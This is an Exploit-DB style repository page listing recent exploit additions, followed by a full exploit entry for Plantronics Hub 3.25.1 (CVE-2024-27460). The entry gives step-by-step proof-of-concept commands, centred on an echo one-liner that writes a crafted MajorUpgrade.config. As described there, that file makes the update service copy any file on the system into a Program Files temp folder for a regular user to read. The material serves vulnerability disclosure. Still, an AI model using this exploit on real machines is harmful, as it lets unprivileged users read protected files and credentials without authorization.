9d17a3d6ca
10 changes to exploits/shellcodes/ghdb CrushFTP < 11.1.0 - Directory Traversal Apache mod_proxy_cluster - Stored XSS CE Phoenix Version 1.0.8.20 - Stored XSS Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS) Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS) Prison Management System - SQL Injection Authentication Bypass PyroCMS v3.0.1 - Stored XSS Plantronics Hub 3.25.1 - Arbitrary File Read
25 lines
No EOL
1.1 KiB
Text
25 lines
No EOL
1.1 KiB
Text
# Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read
|
||
# Date: 2024-05-10
|
||
# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from
|
||
Mastercard
|
||
# Vendor Homepage:
|
||
https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895
|
||
# Version: Plantronics Hub for Windows version 3.25.1
|
||
# Tested on: Windows 10/11
|
||
# CVE : CVE-2024-27460
|
||
|
||
As a regular user drop a file called "MajorUpgrade.config" inside the
|
||
"C:\ProgramData\Plantronics\Spokes3G" directory. The content of
|
||
MajorUpgrade.config should look like the following one liner:
|
||
^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
|
||
|
||
Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy
|
||
(any file on the system). The desired file will be copied into C:\Program
|
||
Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp
|
||
|
||
Steps to reproduce (POC):
|
||
- Open cmd.exe
|
||
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
|
||
- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
|
||
- Desired file will be copied into C:\Program Files
|
||
(x86)\Plantronics\Spokes3G\UpdateServiceTemp |